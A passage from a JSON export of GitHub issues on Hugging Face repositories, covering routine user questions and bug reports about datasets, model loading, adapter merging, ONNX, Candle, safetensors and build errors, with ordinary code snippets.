or an outside addon?\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/546", "state": "closed", "labels": [], "created_at": "2023-11-08T08:26:43Z", "updated_at": "2023-11-15T09:32:22Z", "comments": 2, "user": "kaplanyaniv" }, { "repo": "huggingface/datasets", "number": 6388, "title": "How to create a 3d medical image dataset?", "body": "### Feature request\r\n\r\nI am new to huggingface. After looking through the `datasets` docs, I can't find how to create a dataset that contains 3d medical images (ending with '.mhd', '.dcm', '.nii').\r\n\r\n### Motivation\r\n\r\nHelp us upload 3d medical datasets to huggingface!\r\n\r\n### Your contribution\r\n\r\nI'll submit a PR if I find a way to add this feature", "url": "https://github.com/huggingface/datasets/issues/6388", "state": "open", "labels": [ "enhancement" ], "created_at": "2023-11-07T11:27:36Z", "updated_at": "2023-11-07T11:28:53Z", "user": "QingYunA" }, { "repo": "huggingface/datasets", "number": 6387, "title": "How to load an existing downloaded dataset?", "body": "Hi @mariosasko @lhoestq @katielink \r\n\r\nThanks for your contribution and hard work.\r\n\r\n### Feature request\r\n\r\nFirst, I download a dataset as normal by:\r\n```\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset('username/data_name', cache_dir='data')\r\n```\r\n\r\nThe dataset format in the `data` directory will be:\r\n```\r\n-data\r\n |-data_name\r\n |-test-00000-of-00001-bf4c733542e35fcb.parquet\r\n |-train-00000-of-00001-2a1df75c6bce91ab.parquet\r\n```\r\n\r\n\r\nThen I use SCP to clone this dataset onto another machine, and then try:\r\n```\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset('data/data_name') # load from local path\r\n```\r\n\r\nThis leads to re-generating the training and validation splits each time, and the disk space is occupied twice.\r\n\r\nHow can I just load the dataset without generating and saving these splits again?\r\n\r\n### Motivation\r\n\r\nI do not want to download the same dataset on two machines; scp is much faster and better than the HuggingFace API. I hope we can directly load the downloaded datasets (.parquet).\r\n\r\n### Your contribution\r\n\r\nPlease refer to the feature", "url": "https://github.com/huggingface/datasets/issues/6387", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-11-06T22:51:44Z", "updated_at": "2023-11-16T18:07:01Z", "user": "liming-ai" }, { "repo": "huggingface/gsplat.js", "number": 15, "title": "Does it work with polycam models?", "body": "Hello! Thank you for your work, it looks very promising. Got it working with the README file... Just tried it with a .ply object out of polycam and got an error\r\n\r\n```\r\nUncaught (in promise) RangeError: byte length of Float32Array should be a multiple of 4\r\n at new Float32Array ()\r\n at R.setData (Scene.ts:43:25)\r\n at W.LoadAsync (Loader.ts:31:15)\r\n at async main (main.ts:11:5)\r\n\r\n```\r\n\r\nWhat file types is it compatible with? Thanks!", "url": "https://github.com/huggingface/gsplat.js/issues/15", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-06T21:15:51Z", "updated_at": "2023-11-10T18:26:55Z", "user": "karen-pal" }, { "repo": "huggingface/chat-ui", "number": 545, "title": "Chat-UI throws a 403 forbidden when accessing settings", "body": "When viewing the settings page after first setup, the settings page gives the error ```Failed to load resource: the server responded with a status of 403 (Forbidden) settings:1``` in the console. 
Without any explanation of what and why.\r\n\r\nSetup:\r\n```yaml\r\nservices:\r\n # Chat ui webserver\r\n chat-ui:\r\n container_name: chat\r\n build:\r\n context: ./\r\n dockerfile: Dockerfile\r\n ports:\r\n - 8080:3000\r\n networks:\r\n default:\r\n ipv4_address: 172.25.0.2\r\n\r\n # Mongo database \r\n database:\r\n container_name: mongo-chatui\r\n image: \"mongo:latest\"\r\n ports:\r\n - 27017:27017\r\n restart: always\r\n environment:\r\n - MONGO_INITDB_DATABASE=chat-ui\r\n networks:\r\n default:\r\n ipv4_address: 172.25.0.3\r\n\r\nnetworks:\r\n default:\r\n driver: bridge\r\n ipam:\r\n driver: default\r\n config:\r\n - subnet: 172.25.0.0/28\r\n gateway: 172.25.0.1\r\n```\r\n\r\nAnd my .env.local: \r\n```\r\nMONGODB_URL=mongodb://172.25.0.3:27017\r\nPUBLIC_ORIGIN=http://localhost:3030\r\nHF_ACCESS_TOKEN=recacted\r\nMODELS=recated\r\n```\r\n\r\nWhat are the steps to take here? \r\n\r\nThe database connections gets accepted according to the mongoDB instance", "url": "https://github.com/huggingface/chat-ui/issues/545", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-06T15:09:33Z", "updated_at": "2024-02-15T21:03:04Z", "comments": 5, "user": "IT-Guy007" }, { "repo": "huggingface/alignment-handbook", "number": 9, "title": "How to finetune or lora on custom dataset", "body": "How to finetune or lora on custom dataset", "url": "https://github.com/huggingface/alignment-handbook/issues/9", "state": "open", "labels": [], "created_at": "2023-11-05T02:38:33Z", "updated_at": "2024-11-11T07:52:57Z", "user": "universewill" }, { "repo": "huggingface/peft", "number": 1080, "title": "Add docs on how to merge adapters after 4bit QLoRA with PEFT 0.6", "body": "### Feature request\r\n\r\nthere has been some controversy on how to correctly **merge the adapters with the base model after 4bit LoRA** training. 
\r\n\r\nto me it seems there are two ways to merge and save:\r\n\r\n- ChrisHayduk https://gist.github.com/ChrisHayduk/1a53463331f52dca205e55982baf9930\r\n- TheBloke https://github.com/TheBlokeAI/AIScripts/blob/main/merge_peft_adapters.py\r\n\r\nWhat is the correct way to merge the adapters now (with PEFT 0.6 and [PR 851](https://github.com/huggingface/peft/pull/851) merged) after training a 4-bit quantized model ?\r\n\r\n### Motivation\r\n\r\nno docs, at least i haven't found any\r\n\r\n### Your contribution\r\n\r\nexample:\r\n\r\n**quantize and train**\r\n```\r\nmodelpath=\"models/Mistral-7B-v0.1\"\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n modelpath, \r\n load_in_4bit=True,\r\n quantization_config=BitsAndBytesConfig(\r\n load_in_4bit=True,\r\n llm_int8_threshold=6.0,\r\n llm_int8_has_fp16_weight=False,\r\n bnb_4bit_compute_dtype=torch.bfloat16,\r\n bnb_4bit_use_double_quant=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n ),\r\n torch_dtype=torch.bfloat16,\r\n)\r\n\r\nmodel = prepare_model_for_kbit_training(model)\r\nconfig = LoraConfig(\r\n r=64, \r\n lora_alpha=16, \r\n target_modules =\r\n ['q_proj', \r\n 'k_proj', \r\n 'down_proj', \r\n 'v_proj', \r\n 'gate_proj', \r\n 'o_proj', \r\n 'up_proj'],\r\n lora_dropout=0.1, \r\n bias=\"none\", \r\n task_type=\"CAUSAL_LM\"\r\n)\r\nmodel = get_peft_model(model, config)\r\n\r\ntrain ...\r\n```\r\n\r\n**merge and save** \r\n```\r\nbase_model = AutoModelForCausalLM.from_pretrained(\r\n \"models/Mistral-7B-v0.1\",\r\n return_dict=True,\r\n torch_dtype=torch.bfloat16,\r\n)\r\n\r\nmodel = PeftModel.from_pretrained(base_model, \"some-checkpoint\")\r\nmodel = model.merge_and_unload()\r\n\r\nmodel.save_pretrained(args.out, safe_serialization=True)\r\n```\r\n\r\nis this the proper way to do it? if yes/no, it would be nice to have this documented somwhere! \ud83e\udd17\r\n ", "url": "https://github.com/huggingface/peft/issues/1080", "state": "closed", "labels": [], "created_at": "2023-11-04T10:07:16Z", "updated_at": "2023-11-17T22:22:06Z", "user": "geronimi73" }, { "repo": "huggingface/huggingface_hub", "number": 1801, "title": "Entire operation get cancelled when 1 file fails when using api.upload_folder - how to make it iterative", "body": "I am using below code. Uploaded like 80 GB file and the entire operation failed just because of 1 png failed to upload for some reason\r\n\r\nI see uploaded repo has 0 changes\r\n\r\nHow can I make it iterative? So after each file upload it is committed to the repo\r\n\r\nI don't need commit or file history. 
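For reference, a per-file loop along these lines gives one commit per file, so a single failure no longer discards everything else. This is a sketch built on `HfApi.upload_file`; the retry/skip policy is left to the caller:

```python
from pathlib import Path
from huggingface_hub import HfApi

api = HfApi()
folder = Path("/workspace/path")
for path in sorted(p for p in folder.rglob("*") if p.is_file()):
    try:
        # One commit per file: an individual failure only skips this file.
        api.upload_file(
            path_or_fileobj=str(path),
            path_in_repo=str(path.relative_to(folder)),
            repo_id="username/repo",
            repo_type="model",
        )
    except Exception as err:
        print(f"upload failed for {path}: {err}")  # collect and retry later
```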
Just upload newer files and overwrite if newer\r\n\r\n```\r\nfrom huggingface_hub import HfApi\r\napi = HfApi()\r\n\r\n# Upload all the content from the local folder to your remote Space.\r\n# By default, files are uploaded at the root of the repo\r\napi.upload_folder(\r\n folder_path=\"/workspace/path\",\r\n repo_id=\"username/repo\",\r\n repo_type=\"model\",\r\n)\r\n```\r\n\r\n### Reproduction\r\n\r\n_No response_\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System info\r\n\r\n```shell\r\n- huggingface_hub version: 0.16.4\r\n- Platform: Linux-5.15.0-86-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Running in iPython ?: No\r\n- Running in notebook ?: No\r\n- Running in Google Colab ?: No\r\n- Token path ?: /root/.cache/huggingface/token\r\n- Has saved token ?: True\r\n- Who am I ?: ME\r\n- Configured git credential helpers: \r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: 2.0.1+cu118\r\n- Jinja2: 3.1.2\r\n- Graphviz: N/A\r\n- Pydot: N/A\r\n- Pillow: 9.5.0\r\n- hf_transfer: N/A\r\n- gradio: 3.41.2\r\n- tensorboard: N/A\r\n- numpy: 1.23.5\r\n- pydantic: 1.10.12\r\n- aiohttp: 3.8.5\r\n- ENDPOINT: https://huggingface.co\r\n- HUGGINGFACE_HUB_CACHE: /root/.cache/huggingface/hub\r\n- HUGGINGFACE_ASSETS_CACHE: /root/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /root/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: False\r\n```\r\n", "url": "https://github.com/huggingface/huggingface_hub/issues/1801", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-04T00:20:00Z", "updated_at": "2023-11-26T09:09:35Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers.js", "number": 378, "title": "Security issue - content security policy - script unsafe-eval", "body": "Context:\r\nI use @xenova/transformers 2.6.2 npm package from a web application to do image classifcations. Here is the gist of my setup:\r\n\r\n```js\r\nconst modelPath = 'own-domain/models-and-wasm/'\r\n\r\nenv.localModelPath = \"/\";\r\nenv.useBrowserCache = true;\r\nenv.backends.onnx.wasm.wasmPaths = modelPath;\r\n\r\nconst classifier = await pipeline(\"image-classification\", modelPath, { quantized: true });\r\nconst output = await classifier(imagePath, { topk: 5 });\r\n```\r\n\r\nEverything works code-wise but when I remove unsafe-inline in CSP, it fails with this warning in the browser console:\r\n\r\n```js\r\nFailed to asynchronously prepare wasm: \r\nCompileError: WebAssembly.instantiate(): Refused to compile or instantiate WebAssembly module because 'unsafe-eval' is not an allowed source of script in the following Content Security Policy directive\r\n```\r\n\r\nI **cannot** allow script-src: unsafe-eval in my web application (corporate rules). Do I have any alternatives? ", "url": "https://github.com/huggingface/transformers.js/issues/378", "state": "open", "labels": [ "question" ], "created_at": "2023-11-03T13:50:30Z", "updated_at": "2023-11-06T13:44:57Z", "user": "stiano" }, { "repo": "huggingface/diffusers", "number": 5643, "title": "How to use the ip adapter controlnet?", "body": "Hi, I can't use this specific controlnet because it's from here: https://huggingface.co/lllyasviel/sd_control_collection/tree/main\r\n\r\nand the format doesn't allow from_pretrained. 
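(A hedged aside: the `ip-adapter_*.pth` files in that collection are not ControlNet checkpoints at all, which is consistent with the converter failing on missing UNet keys below. In recent diffusers versions they load through the IP-Adapter API instead; this sketch assumes `load_ip_adapter` is available in the installed version:

```python
# Sketch: load IP-Adapter weights onto a pipeline instead of treating them as
# a ControlNet (load_ip_adapter assumed available in recent diffusers).
import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5", torch_dtype=torch.float16
).to("cuda")
pipe.load_ip_adapter(
    "h94/IP-Adapter", subfolder="models", weight_name="ip-adapter-plus_sd15.bin"
)
```
)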
When I use from_single_file, I get:\r\n```\r\n\r\nstable_diffusion/convert_from_ckpt.py\", line 422, in convert_ldm_unet_checkpoint\r\n new_checkpoint[\"time_embedding.linear_1.weight\"] = unet_state_dict[\"time_embed.0.weight\"]\r\nKeyError: 'time_embed.0.weight'\r\n```\r\nI used this to get the error:\r\n`ControlNetModel.from_single_file(\"./ip-adapter_sd15_plus.pth\", torch_dtype=torch.float32,local_files_only=True).to('cuda')`\r\n\r\na similar error was raised and the response was: \"just don't use from_single_file\" https://github.com/huggingface/diffusers/issues/5577", "url": "https://github.com/huggingface/diffusers/issues/5643", "state": "closed", "labels": [], "created_at": "2023-11-03T13:34:44Z", "updated_at": "2023-11-13T15:12:29Z", "user": "alexblattner" }, { "repo": "huggingface/dataset-viewer", "number": 2050, "title": "Should we support video datasets?", "body": "Like https://huggingface.co/datasets/commaai/commavq\r\n\r\nThere was a previous intent in datasets: https://github.com/huggingface/datasets/pull/5339", "url": "https://github.com/huggingface/dataset-viewer/issues/2050", "state": "closed", "labels": [ "question", "feature request" ], "created_at": "2023-11-03T13:33:00Z", "updated_at": "2023-12-11T15:04:08Z", "user": "severo" }, { "repo": "huggingface/distil-whisper", "number": 16, "title": "How to use ONNX model?", "body": "Hello there,\r\n\r\nI'm interested in using the ONNX model, as I saw that you are providing the weights for it.\r\nI tried to use it with `optimum` library, but didn't manage to make it work.\r\nCould someone indicate in which direction I should look into?\r\n\r\nThank you so much for this repository and the work you put into it. It really helps!!\r\n\r\n### Note:\r\n\r\n here is what I tried\r\n\r\n```\r\nfrom transformers import AutoModelForSpeechSeq2Seq, AutoProcessor\r\nimport torch\r\nfrom optimum.onnxruntime import ORTModelForSpeechSeq2Seq\r\n\r\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\r\ntorch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32\r\n\r\nmodel_id = \"distil-whisper/distil-large-v2\"\r\n\r\nmodel = ORTModelForSpeechSeq2Seq.from_pretrained(\r\n model_id, torch_dtype=torch_dtype, encoder_file_name=f\"encoder_model.onnx\"\r\n)\r\n```\r\n\r\nHere is the error:\r\n```\r\nRuntimeError: Too many ONNX model files were found in distil-whisper/distil-large-v2, specify which one to load by using the encoder_file_name argument.\r\n```", "url": "https://github.com/huggingface/distil-whisper/issues/16", "state": "open", "labels": [], "created_at": "2023-11-03T11:51:44Z", "updated_at": "2023-11-07T07:36:50Z", "user": "H-G-11" }, { "repo": "huggingface/dataset-viewer", "number": 2049, "title": "Retry jobs that finish with `ClientConnection` error?", "body": "Maybe here: https://github.com/huggingface/datasets-server/blob/f311a9212aaa91dd0373e5c2d4f5da9b6bdabcb5/chart/env/prod.yaml#L209\r\n\r\nInternal conversation on Slack: https://huggingface.slack.com/archives/C0311GZ7R6K/p1698224875005729\r\n\r\nAnyway: I'm wondering if we can have the error now that the dataset scripts are disabled by default.", "url": "https://github.com/huggingface/dataset-viewer/issues/2049", "state": "closed", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2023-11-03T11:28:19Z", "updated_at": "2024-02-06T17:29:45Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 377, "title": "GPU Acceleration to increase performance", "body": "Do we have any option to use GPU to increase 
performance of model loading and detection?\r\nAs currently in Object Detection it's taking around 10 seconds. If we want to do this on GPU, can we do that?\r\n\r\nRunning below lines through web worker, increases overall UI experience but not increases any performance.\r\n```\r\nconst model = await pipeline(\"object-detection\", \"Xenova/detr-resnet-50\");\r\nconst result = await model(img, { threshold: 0.9 });\r\n```\r\n\r\nCan we use GPU for that?", "url": "https://github.com/huggingface/transformers.js/issues/377", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-03T07:44:05Z", "updated_at": "2024-10-18T13:30:08Z", "user": "milind-yadav" }, { "repo": "huggingface/distil-whisper", "number": 11, "title": "[Speculative Decoding] How to run speculative decoding for batch_size > 1? ", "body": "Transformers 4.35 only supports speculative decoding for batch size == 1. In order to use speculative decoding for batch size > 1, please make sure to use this branch: https://github.com/huggingface/transformers/pull/26875\r\n\r\nTo do so, you need to install transformers as follows:\r\n\r\n```\r\npip install git+https://github.com/huggingface/transformers.git@assistant_decoding_batch\r\n```\r\n\r\nand then you can run:\r\n\r\n```py\r\nfrom transformers import pipeline, AutoModelForCausalLM, AutoModelForSpeechSeq2Seq, AutoProcessor\r\nimport torch\r\nfrom datasets import load_dataset\r\n\r\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\r\ntorch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32\r\n\r\nassistant_model_id = \"distil-whisper/distil-large-v2\"\r\n\r\nassistant_model = AutoModelForCausalLM.from_pretrained(\r\n assistant_model_id, torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True\r\n)\r\nassistant_model.to(device)\r\n\r\nmodel_id = \"openai/whisper-large-v2\"\r\n\r\nmodel = AutoModelForSpeechSeq2Seq.from_pretrained(\r\n model_id, torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True\r\n)\r\nmodel.to(device)\r\n\r\nprocessor = AutoProcessor.from_pretrained(model_id)\r\n\r\npipe = pipeline(\r\n \"automatic-speech-recognition\",\r\n model=model,\r\n tokenizer=processor.tokenizer,\r\n feature_extractor=processor.feature_extractor,\r\n max_new_tokens=128,\r\n generate_kwargs={\"assistant_model\": assistant_model},\r\n torch_dtype=torch_dtype,\r\n chunk_length_s=15,\r\n batch_size=4,\r\n device=device,\r\n)\r\n\r\ndataset = load_dataset(\"distil-whisper/librispeech_long\", \"default\", split=\"validation\")\r\nsample = dataset[0][\"audio\"]\r\n\r\nresult = pipe(sample)\r\nprint(result[\"text\"])\r\n```\r\n\r\nThe PR will be merged to Transformers soon.\r\n\r\n**Note**: Given the \"speculative\" nature of assistant decoding (*a.k.a* speculative decoding), it is not recommended to make use of speculative decoding for batch sizes higher than 4 as this might actually lead to the transcription pipeline being slower compared to just using the teacher model. 
\r\nConfer with Table 22 of [the paper](https://arxiv.org/pdf/2311.00430.pdf).", "url": "https://github.com/huggingface/distil-whisper/issues/11", "state": "open", "labels": [], "created_at": "2023-11-02T14:19:55Z", "updated_at": "2024-10-03T13:12:22Z", "user": "patrickvonplaten" }, { "repo": "huggingface/chat-ui", "number": 542, "title": "Request: more clarity on JSON response from custom models", "body": "Note: duplicate from https://huggingface.co/spaces/huggingchat/chat-ui/discussions/309, not sure which is the proper place to post.\r\n\r\nI followed the chat-ui guide to deploy a version on GCP, and I love the chat interface.\r\n\r\nI would love to hook it up to one of my custom models, so I specified\r\n```\r\n\"endpoints\": [{\"url\": \"http://127.0.0.1:8000\"}]\r\n```\r\nfor MODELS as suggested.\r\n\r\nI receive the message that has been posted in the web interface at my endpoint, but I am unable to send back the proper json response. So far, in python, I do:\r\n```\r\nresponse_content = [\r\n{\r\n\"generated_text\": \"Please show this response.\"\r\n}\r\n]\r\nresponse = make_response(jsonify(response_content))\r\nreturn response\r\n```\r\n\r\nIt is received in the chat-ui code (confirmed by injecting console.log statements), but it doesn't show in the browser conversation.\r\n\r\nCan someone please clarify what json (content, headers, whatever is needed) I need to send from my custom model endpoint as a response to the chat-ui interface? Or, if this is the wrong place to ask, tell me where I should ask?", "url": "https://github.com/huggingface/chat-ui/issues/542", "state": "open", "labels": [ "support" ], "created_at": "2023-11-02T10:31:53Z", "updated_at": "2023-11-03T19:44:02Z", "comments": 1, "user": "thubreg" }, { "repo": "huggingface/distil-whisper", "number": 8, "title": "Where is the model?", "body": "The link to HF leads to an empty files section.", "url": "https://github.com/huggingface/distil-whisper/issues/8", "state": "closed", "labels": [], "created_at": "2023-11-02T08:47:23Z", "updated_at": "2023-11-02T17:31:08Z", "user": "lkmdhertg" }, { "repo": "huggingface/candle", "number": 1241, "title": "How to reduce memory usage of backpropagation?", "body": "I implemented the [tiny NeRF example](https://github.com/bmild/nerf/blob/master/tiny_nerf.ipynb) using `candle` here: https://github.com/laptou/nerfy/blob/fc50dbd61c4012d1f12f556a72474b59a8b3c158/examples/tiny_nerf.rs\r\n\r\nThe example, which is written using TensorFlow, runs fine on my laptop. My `candle` implementation consumes all available memory on my laptop, which crashes my desktop session if I use CPU and errors out with a CUDA memory allocation error if I use the GPU. I'm running on a laptop with 32 GB of RAM, 32 GB of swap, and an RTX A3000 w/ 12 GB of VRAM. \r\n\r\nI'm barely able to run it on CPU if I decrease the hidden layer size from 256 to 64.\r\n\r\n![image](https://github.com/huggingface/candle/assets/14832331/683d4361-9ccb-4f04-939e-67e0f3ba0414)\r\n\r\nI tracked the memory allocations using `heaptrack`, and it seems like most of them are related to keeping track of the operations for backpropagation. \r\n\r\nCan you spot any obvious issues in my implementation that are causing it to consume so much memory? 
Is there a way that I can disable or reduce this behavior in some parts of the code to reduce the amount of memory that it uses?", "url": "https://github.com/huggingface/candle/issues/1241", "state": "open", "labels": [], "created_at": "2023-11-02T03:38:32Z", "updated_at": "2025-09-10T05:14:01Z", "user": "laptou" }, { "repo": "huggingface/candle", "number": 1240, "title": "Demo showing how to load a candle computer vision model using a webcam", "body": "```rust\r\nuse anyhow::Result; // Automatically handle the error types\r\nuse opencv::{\r\n    prelude::*,\r\n    videoio,\r\n    highgui\r\n}; // Note, the namespace of OpenCV is changed (for better or worse). It is no longer one enormous namespace.\r\nfn main() -> Result<()> { // Note, this is anyhow::Result\r\n    // Open a GUI window\r\n    highgui::named_window(\"window\", highgui::WINDOW_FULLSCREEN)?;\r\n    // Open the web-camera (assuming you have one)\r\n    let mut cam = videoio::VideoCapture::new(0, videoio::CAP_ANY)?;\r\n    let mut frame = Mat::default(); // This array will store the web-cam data\r\n    // Read the camera\r\n    // and display in the window\r\n    loop {\r\n        cam.read(&mut frame)?;\r\n        highgui::imshow(\"window\", &frame)?;\r\n        let key = highgui::wait_key(1)?;\r\n        if key == 113 { // quit with q\r\n            break;\r\n        }\r\n    }\r\n    Ok(())\r\n}\r\n```\r\n\r\nHere is a basic example of opening a GUI window using opencv-rust.\r\nIt would be great to have a working example using this alongside candle!\r\nOpen to submitting this as a PR in any of the example folders.", "url": "https://github.com/huggingface/candle/issues/1240", "state": "open", "labels": [], "created_at": "2023-11-02T03:38:19Z", "updated_at": "2023-11-02T06:24:11Z", "user": "bazylhorsey" }, { "repo": "huggingface/candle", "number": 1239, "title": "How to run inference on a new model? Does model.rs have to be handwritten manually?", "body": "Just wondering if there are scripts to convert a pth or onnx file to the candle format, maybe?", "url": "https://github.com/huggingface/candle/issues/1239", "state": "closed", "labels": [], "created_at": "2023-11-02T03:32:11Z", "updated_at": "2023-11-02T07:03:54Z", "user": "lucasjinreal" }, { "repo": "huggingface/safetensors", "number": 375, "title": "How do I load the tensors in Rust? ", "body": "Hi, \r\n\r\nI am unable to find good documentation to read the weights in rust. I want to write gpt2 from scratch, and want to be able to load the HF weights. Since I only plan to use the ndarray library, I want to be able to load the FP32 tensors somehow. Please help. 
\r\n\r\nIn python I do:\r\n```python\r\n# Load model directly\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\nimport safetensors.torch\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"gpt2\")\r\nmodel = AutoModelForCausalLM.from_pretrained(\"gpt2\")\r\nsafetensors.torch.save_model(model, 'gpt2_weights.st')\r\n```\r\n\r\nI want to use some code like this in rust (which is currently incorrect because safetensors doesn't have a Reader) and I am unable to figure out the API.\r\n```rust\r\nuse safetensors::Reader;\r\nuse std::error::Error;\r\n\r\nfn main() -> Result<(), Box<dyn Error>> {\r\n    let reader = Reader::from_file(\"gpt2_weights.st\")?;\r\n\r\n    for (name, tensor) in reader.tensors() {\r\n        println!(\"Tensor name: {}\", name);\r\n        let tensor = tensor?;\r\n        println!(\"Shape: {:?}\", tensor.shape()); \r\n    }\r\n\r\n    Ok(())\r\n}\r\n```", "url": "https://github.com/huggingface/safetensors/issues/375", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-02T02:11:11Z", "updated_at": "2024-01-02T01:48:31Z", "comments": 5, "user": "arunpatro" }, { "repo": "huggingface/safetensors", "number": 374, "title": "safetensors.*.save_file: the parameter name for the incoming tensors changes from \"tensors\" to \"tensor_dict\"", "body": "### Feature request\r\n\r\nIn JAX, torch, and paddle it is:\r\n\r\n> tensors (Dict[str, torch.Tensor]) \u2014 The incoming tensors. Tensors need to be contiguous and dense.\r\n\r\nCheck: https://huggingface.co/docs/safetensors/api/torch#safetensors.torch.save\r\n\r\nIn Numpy:\r\n\r\n> tensor_dict (Dict[str, np.ndarray]) \u2014 The incoming tensors. Tensors need to be contiguous and dense.\r\n\r\nCheck: https://huggingface.co/docs/safetensors/api/numpy#safetensors.numpy.save_file\r\n\r\nIs there a reason to change the name between frameworks?\r\n\r\n### Motivation\r\n\r\nImprove the documentation.\r\n\r\n### Your contribution\r\n\r\nI can submit a PR if that helps!", "url": "https://github.com/huggingface/safetensors/issues/374", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-02T00:41:14Z", "updated_at": "2024-01-02T01:48:32Z", "comments": 2, "user": "csaybar" }, { "repo": "huggingface/safetensors", "number": 373, "title": "Stream load models (load model larger than system memory)", "body": "### Feature request\r\n\r\nI'm not very familiar with the details, but I'd like to load a 20GB model while having only 8 GB of system memory.\r\n\r\nCurrently, safetensors loads the entire model into system memory.\r\nIs it possible to load models incrementally/as a stream?\r\n\r\nRelated:\r\nhttps://github.com/turboderp/exllama/issues/245\r\nhttps://github.com/huggingface/safetensors/issues/67\r\n\r\nPossibly related (writing is different from reading):\r\nhttps://github.com/huggingface/safetensors/issues/291\r\n\r\n### Motivation\r\n\r\nUsing swap causes unnecessary wear on SSDs. 
And it's silly to read a model from disk, just to write it back to disk as a swap, and then read it again from disk.\r\n\r\nAlternatively, the model should be saved in a format that can be streamed directly to memory?\r\n\r\nSimilarly, it's silly to require X amount of system memory to be available for just a few seconds while loading a large model.\r\n\r\n### Your contribution\r\n\r\nUnqualified to contribute.", "url": "https://github.com/huggingface/safetensors/issues/373", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-01T16:14:18Z", "updated_at": "2024-01-03T01:48:07Z", "comments": 6, "user": "erikschul" }, { "repo": "huggingface/text-embeddings-inference", "number": 59, "title": "how to resolve this compile error?", "body": "### System Info\n\ncargo 1.73.0 (9c4383fb5 2023-08-26)\r\ngcc (GCC) 9.3.1 20200408 (Red Hat 9.3.1-2)\r\ncuda 11.8\r\nv100\r\n\r\n\r\n```\r\n\"-Wl,-Bdynamic\" \"-llayernorm\" \"-lcudart\" \"-lstdc++\" \"-lcuda\" \"-lnvrtc\" \"-lcurand\" \"-lcublas\" \"-lcublasLt\" \"-lssl\" \"-lcrypto\" \"-lgcc_s\" \"-lutil\" \"-lrt\" \"-lpthread\" \"-lm\" \"-ldl\" \"-lc\" \"-Wl,--eh-frame-hdr\" \"-Wl,-z,noexecstack\" \"-L\" \"/home/luoweichao/.rustup/toolchains/1.73.0-x86_64-unknown-linux-gnu/lib/rustlib/x86_64-unknown-linux-gnu/lib\" \"-o\" \"/home/luoweichao/text-embeddings-inference/target/release/deps/text_embeddings_router-0345b2604448f561\" \"-Wl,--gc-sections\" \"-pie\" \"-Wl,-z,relro,-z,now\" \"-Wl,-O1\" \"-nodefaultlibs\"\r\n = note: /opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/ld: /home/luoweichao/text-embeddings-inference/target/release/build/candle-layer-norm-3b4dbfa3d047ac72/out/liblayernorm.a(ln_api.o): relocation R_X86_64_32 against `.rodata.str1.1' can not be used when making a PIE object; recompile with -fPIC\r\n /opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/ld: final link failed: nonrepresentable section on output\r\n collect2: error: ld returned 1 exit status\r\n \r\n\r\nerror: could not compile `text-embeddings-router` (bin \"text-embeddings-router\") due to previous error\r\nerror: failed to compile `text-embeddings-router v0.3.0 (/home/luoweichao/text-embeddings-inference/router)`, intermediate artifacts can be found at `/home/luoweichao/text-embeddings-inference/target`.\r\n```\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\ncargo install --path router -F candle-cuda-volta --no-default-features\n\n### Expected behavior\n\nbuild successfully!", "url": "https://github.com/huggingface/text-embeddings-inference/issues/59", "state": "closed", "labels": [], "created_at": "2023-10-31T11:35:02Z", "updated_at": "2023-11-02T07:52:18Z", "user": "kingder" }, { "repo": "huggingface/optimum", "number": 1497, "title": "about LCM onnx model", "body": "Hi!\r\n\r\nCan someone please tell us how we can use the LCM model in ONNX? I see you made a script to run it in ONNX, but what about the model? Can we simply use the normal Stable Diffusion ONNX conversion script for the LCM model too? 
